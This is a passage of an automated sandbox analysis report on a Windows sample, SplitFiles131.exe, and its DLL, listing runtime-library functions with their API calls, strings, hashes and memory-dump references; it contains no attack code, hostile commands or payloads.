Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a7358a4db6e1da6d63c69c07c6b5017a17c7ec25ee6c44925f82e9684ad80130
Instruction ID: 50d7879656c57a25cf13df4160670f294727ae21723d392f61a5f7ff99cca00a
Opcode Fuzzy Hash: a7358a4db6e1da6d63c69c07c6b5017a17c7ec25ee6c44925f82e9684ad80130
Instruction Fuzzy Hash: D2112C75550B04EAEA20FBB0CC46FDB77ADEF00780F900815B2ADA616EDBA5B504CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00404360 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004043EF

Part of subcall function 0041044B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,0040E035,?,0043B72C,?), ref: 004104AB

Strings

ios_base::failbit set, xrefs: 0040439F
ios_base::badbit set, xrefs: 00404395
`=@, xrefs: 00404338, 0040440B
`=@, xrefs: 004043F4
ios_base::eofbit set, xrefs: 004043A4

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: `=@$`=@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-2436082744
Opcode ID: 2276f604c3605784d6e405f8d7a2a755b298f9d58d573019e86a6d79aba38d61
Instruction ID: 5758688b685aa4187ad7d7f5b15dace94247948c6bb2fc7bee6470d4da2af1b6
Opcode Fuzzy Hash: 2276f604c3605784d6e405f8d7a2a755b298f9d58d573019e86a6d79aba38d61
Instruction Fuzzy Hash: FB11E4B16003045BC714DF59D802B96B3E8AF84310F10D53FFA55ABA81E778E854CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004207BB Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420803
__fassign.LIBCMT ref: 004209E8
__fassign.LIBCMT ref: 00420A05
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420A4D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00420A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420B35

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 45f1c1bc1b9525421630f80e21f96edc239ce45b7ad5b4f0668f9778ebca938e
Instruction ID: 5bda8817d63fbd95ec10d1615f909a3fa13ea14378ce0ba8d39ea156ef37e8f3
Opcode Fuzzy Hash: 45f1c1bc1b9525421630f80e21f96edc239ce45b7ad5b4f0668f9778ebca938e
Instruction Fuzzy Hash: 59C18E75E002688FCB14CFA9D9809EDFBF5AF18304F68416AE855B7342D635A942CF68

Uniqueness

Uniqueness Score: -1.00%

Function 1000C0D4 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000C11C
__fassign.LIBCMT ref: 1000C301
__fassign.LIBCMT ref: 1000C31E
WriteFile.KERNEL32(?,10008E0A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000C366
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000C3A6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000C44E

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 98efbe4c6ee7657adc3feaa6b2c886c835ef08a3cb57c6140dfa4e34a11008b6
Instruction ID: d8b638840345e1b49b0cc72bb3c582407c8398851cd7aadc47a9f3c0936b2730
Opcode Fuzzy Hash: 98efbe4c6ee7657adc3feaa6b2c886c835ef08a3cb57c6140dfa4e34a11008b6
Instruction Fuzzy Hash: E4C19E75D0025C9FEB11CFE8C8909EDBBB5FF08354F28816AE855B7246D631AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0041F139 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0041F1C3

Strings

UHA, xrefs: 0041F155

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: UHA
API String ID: 3213747228-2890760514
Opcode ID: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
Instruction ID: 45e9e1605b069a012dfbc5f54e827baf5efa537bc91593008a961953a6f8b556
Opcode Fuzzy Hash: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
Instruction Fuzzy Hash: 01B13671A002559FDB11CF68C881BEFBBA5EF55344F2541BBE854AB342D2388D8BC768

Uniqueness

Uniqueness Score: -1.00%

Function 00411DA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00411D9B,0041019F,0040F7D9), ref: 00411DB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00411DC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00411DD9
SetLastError.KERNEL32(00000000,00411D9B,0041019F,0040F7D9), ref: 00411E2B

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
Instruction ID: 538d6b09e676f6115927efde8c1f2b3b6cae1e07978b049f78eb883490b1d345
Opcode Fuzzy Hash: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
Instruction Fuzzy Hash: 3C01F7327093216EA7292BB67C85AE72B94FB05B7AB20033FF610852F1EF595C93514C

Uniqueness

Uniqueness Score: -1.00%

Function 100048EA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,100046F1,100038AA,100032A7,?,100034DF,?,00000001,?,?,00000001,?,10015758,0000000C,100035D8), ref: 100048F8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10004906
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000491F
SetLastError.KERNEL32(00000000,100034DF,?,00000001,?,?,00000001,?,10015758,0000000C,100035D8,?,00000001,?), ref: 10004971

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7a07fe8dd6e183f70e1ed33fe8cb46bc5f72bd9116114fb4a898372d9b8b1887
Instruction ID: aa6f2bb6e0f81693f4a69917c870ce6a712f51b8e9c958d3c9a19b96842cdbe6
Opcode Fuzzy Hash: 7a07fe8dd6e183f70e1ed33fe8cb46bc5f72bd9116114fb4a898372d9b8b1887
Instruction Fuzzy Hash: 5D01287760D322AEF211C7746CC960B26A5FB096F57224339F514511F9EF619C019248

Uniqueness

Uniqueness Score: -1.00%

Function 00423C3E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 00423C8C
_free.LIBCMT ref: 00423DD8

Strings

*?, xrefs: 00423C81

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
Instruction ID: a5b53929445bb92843a6d04ab522df775d1d9dfa49c27ddf940b2185fd00e526
Opcode Fuzzy Hash: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
Instruction Fuzzy Hash: D9616E76E002299FCB14CFA9D8815EEFBF5EF48714F6441AAE815F7300D639AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 10009A2A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Program Files (x86)\Split Files\SplitFiles131.exe, xrefs: 10009A2F

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe
API String ID: 0-4111602209
Opcode ID: e9296d43ca75f7937d2bfdf5c651374163314c5b883c374609abe0d00f2d06f1
Instruction ID: f719ca89bfa5e63d0542726edbeff2ced601996c164ddfce3f4ce27f4cb91101
Opcode Fuzzy Hash: e9296d43ca75f7937d2bfdf5c651374163314c5b883c374609abe0d00f2d06f1
Instruction Fuzzy Hash: 1A21F07170421AAFFB10DF619C80D1B77ADEF062E4B218624F924D7198EB70EC0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 00412F77 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00413038,?,?,00450598,00000000,?,00413163,00000004,InitializeCriticalSectionEx,0042FC40,InitializeCriticalSectionEx,00000000), ref: 00413007

Strings

api-ms-, xrefs: 00412FC7

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
Instruction ID: 324e9a28238f0b2d2c387c29989b4e23a6be0dab15a3266a9455cfbf25704082
Opcode Fuzzy Hash: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
Instruction Fuzzy Hash: 3911A332B41221ABDB325B689D44B9E77B4AF01760F550232F901E7380D7B8ED92A6DD

Uniqueness

Uniqueness Score: -1.00%

Function 10005952 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,10005A13,00000000,?,00000001,00000000,?,10005A8A,00000001,FlsFree,10010CAC,FlsFree,00000000), ref: 100059E2

Strings

api-ms-, xrefs: 100059A2

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 05dae4829f89c238065b3f81865d8903e6a2693040ccf54503ed27d823b8eae0
Instruction ID: d85896a24450fc99b6d677e93262eca8bfdbf032966a5c4c6ca1d277b34163f7
Opcode Fuzzy Hash: 05dae4829f89c238065b3f81865d8903e6a2693040ccf54503ed27d823b8eae0
Instruction Fuzzy Hash: 88115431A41625E7FB12CB588C45B4A37E4EF057F1F224251F954AB188D7B1ED0086D5

Uniqueness

Uniqueness Score: -1.00%

Function 00417BF1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00417BE6,0041CC1F,?,00417BAE,00000000,?,0041CC1F), ref: 00417C06
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00417C19
FreeLibrary.KERNEL32(00000000,?,?,00417BE6,0041CC1F,?,00417BAE,00000000,?,0041CC1F), ref: 00417C3C

Strings

mscoree.dll, xrefs: 00417BFF
CorExitProcess, xrefs: 00417C11

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
Instruction ID: 50fc213c28fa4c0962e30c3ca3a17305303cd13cd11f285dc03a73bb53cf4c5d
Opcode Fuzzy Hash: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
Instruction Fuzzy Hash: E6F08C30644219FBDB219B51DE0ABDEBB79EF00752F5040A1E401A22A0DBB88E02DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 10006D66 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10006D18,10007C68,?,10006CE0,10002482,?,10007C68), ref: 10006D7B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10006D8E
FreeLibrary.KERNEL32(00000000,?,?,10006D18,10007C68,?,10006CE0,10002482,?,10007C68), ref: 10006DB1

Strings

CorExitProcess, xrefs: 10006D86
mscoree.dll, xrefs: 10006D74

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: db8878897a761d3f804d4e4fac8edfdfd5bd9024b52660bc89352341890e853e
Instruction ID: d2a57dd25697f495839985113eab26af44f550b47abe90b3ea9ba5ee1bafc218
Opcode Fuzzy Hash: db8878897a761d3f804d4e4fac8edfdfd5bd9024b52660bc89352341890e853e
Instruction Fuzzy Hash: B3F0A730B01228FBFB02DB90CD09BDD7ABAEF08396F104064F881A2164CBB4CE00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0042A50A Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,DCBD048B,7FFFFFFF,?,?,0042A7C6,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0042A5AD
__alloca_probe_16.LIBCMT ref: 0042A663
__alloca_probe_16.LIBCMT ref: 0042A6F9
__freea.LIBCMT ref: 0042A764
__freea.LIBCMT ref: 0042A770

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: a5fe50a03750e12b804546607bf942e621f4ed7c490ae8aaad7ccc39bb9a9842
Instruction ID: f4f69ad519bf12574fe1d3cc16ac7f29689b845bc3e354e2090f1d74cfa97f91
Opcode Fuzzy Hash: a5fe50a03750e12b804546607bf942e621f4ed7c490ae8aaad7ccc39bb9a9842
Instruction Fuzzy Hash: A981B372E002256BDF209E55AD41AEF7BB59F49714F98005BEC40A7241D73DCC61CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 1000B48F Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,0000000C,7FFFFFFF,?,?,1000B74B,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 1000B532
__alloca_probe_16.LIBCMT ref: 1000B5E8
__alloca_probe_16.LIBCMT ref: 1000B67E
__freea.LIBCMT ref: 1000B6E9
__freea.LIBCMT ref: 1000B6F5

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: c6390f5830a5bd64e0d7d9921fe9131eca71760e160ba7ebcfd4c686c01d4e7a
Instruction ID: 51b2610d37baa8f47a16c6f8ed064628e0d76a618a69041087d5fbf597a7fe1f
Opcode Fuzzy Hash: c6390f5830a5bd64e0d7d9921fe9131eca71760e160ba7ebcfd4c686c01d4e7a
Instruction Fuzzy Hash: 7481B072E00A1A9BFF10DE658C81AEE7BF9DF493D4F150159E804B7249D636DD40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0F4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 1000D178
__alloca_probe_16.LIBCMT ref: 1000D23E
__freea.LIBCMT ref: 1000D2AA

Part of subcall function 1000873B: RtlAllocateHeap.NTDLL(00000000,?,?,?,10003243,?,?,100024B8,0007A120), ref: 1000876D

__freea.LIBCMT ref: 1000D2B3
__freea.LIBCMT ref: 1000D2D6

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 146f262ff555a53674fd139b17de7a2300d41466104e78fb213c224316c85ad6
Instruction ID: 8e48ba519724a98946e6f1a20e563b472711a73b32590d39ac94bb068a9bb579
Opcode Fuzzy Hash: 146f262ff555a53674fd139b17de7a2300d41466104e78fb213c224316c85ad6
Instruction Fuzzy Hash: DC51B172600216ABFB11EE54CC81EAF37A9EF957E0F12012AFD04A7148EB70ED5196B1

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA71 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

_free.LIBCMT ref: 0041BB80
_free.LIBCMT ref: 0041BB97
_free.LIBCMT ref: 0041BBB4
_free.LIBCMT ref: 0041BBCF
_free.LIBCMT ref: 0041BBE6

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 2ac9717b4801cc9c3e4fb2398baf62dd1adc69d55e91d29d558fb5eaeb849720
Instruction ID: dd5676bbc38bf4ddee88e11de66148e0d133859b732eb0a2b9d7e3b8ef29f219
Opcode Fuzzy Hash: 2ac9717b4801cc9c3e4fb2398baf62dd1adc69d55e91d29d558fb5eaeb849720
Instruction Fuzzy Hash: 7051B571A00704AFDB119F2ACC41BAAB7F5EF48724F14056EE809D7794E739E981CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAF0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CB26
std::_Lockit::_Lockit.LIBCPMT ref: 0040CB46
std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB66
std::_Facet_Register.LIBCPMT ref: 0040CC01
std::_Lockit::~_Lockit.LIBCPMT ref: 0040CC19

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 87b63e902258446f7da7e1067b62c0637823b51c00972e01863bc4e59d6f7a1c
Instruction ID: 4299aa7d4a227c1bcf07fbc90c3f6f33ea46ae6c1256ae29d36ea46de7090174
Opcode Fuzzy Hash: 87b63e902258446f7da7e1067b62c0637823b51c00972e01863bc4e59d6f7a1c
Instruction Fuzzy Hash: F641BE71A00215CBCB10DF56E982B6EB7B4EF40714F24457EE8067B382DB79AD45CB89

Uniqueness

Uniqueness Score: -1.00%

Function 10003486 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 100034C3
dllmain_crt_dispatch.LIBCMT ref: 100034DA
dllmain_raw.LIBCMT ref: 10003522
dllmain_crt_dispatch.LIBCMT ref: 10003535
dllmain_raw.LIBCMT ref: 10003548

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 52375cf17bb0d101189a85c26acd30f86b67d56865f3d0828ade5b8236379d4d
Instruction ID: 4eae28f9cec24adab2deedadfa513907509d2ff78710b81ad0a66de0a83b0cb4
Opcode Fuzzy Hash: 52375cf17bb0d101189a85c26acd30f86b67d56865f3d0828ade5b8236379d4d
Instruction Fuzzy Hash: D8217F71D04A65BAFB23CE64DC45A6F3BADEB846D1F018115FC046B228D7309E419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00425AE6 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00425AFE

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 00425B10
_free.LIBCMT ref: 00425B22
_free.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B46

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
Instruction ID: 60f62acaf68e8d6c11223a2e69ab09c63260fcc0bd08be4ea5654f22acdb9dbb
Opcode Fuzzy Hash: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
Instruction Fuzzy Hash: B5F03632A44614ABDA24EB66F891C5BBBDDAA007147E4185BFC0CD7741CB78FCC0866C

Uniqueness

Uniqueness Score: -1.00%

Function 00442FB3 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00442FCB
_free.LIBCMT ref: 00442FDD
_free.LIBCMT ref: 00442FEF
_free.LIBCMT ref: 00443001
_free.LIBCMT ref: 00443013

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

